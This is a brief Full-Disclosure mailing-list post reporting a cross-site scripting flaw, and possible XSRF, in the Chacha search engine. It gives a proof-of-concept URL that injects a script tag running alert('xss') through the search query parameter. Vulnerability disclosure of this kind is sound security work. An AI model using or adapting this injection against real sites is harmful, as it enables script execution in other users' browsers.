There is an XSS vulnerability in the Chacha search engine - possible XSRF as well.
http://search.chacha.com/search/query?query=' <http://search.chacha.com/search/query?query=%27> <script>alert('xss')</script >mode=web&wsid=6661f6c2-b53a-666a-666e-dd666e666dda
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
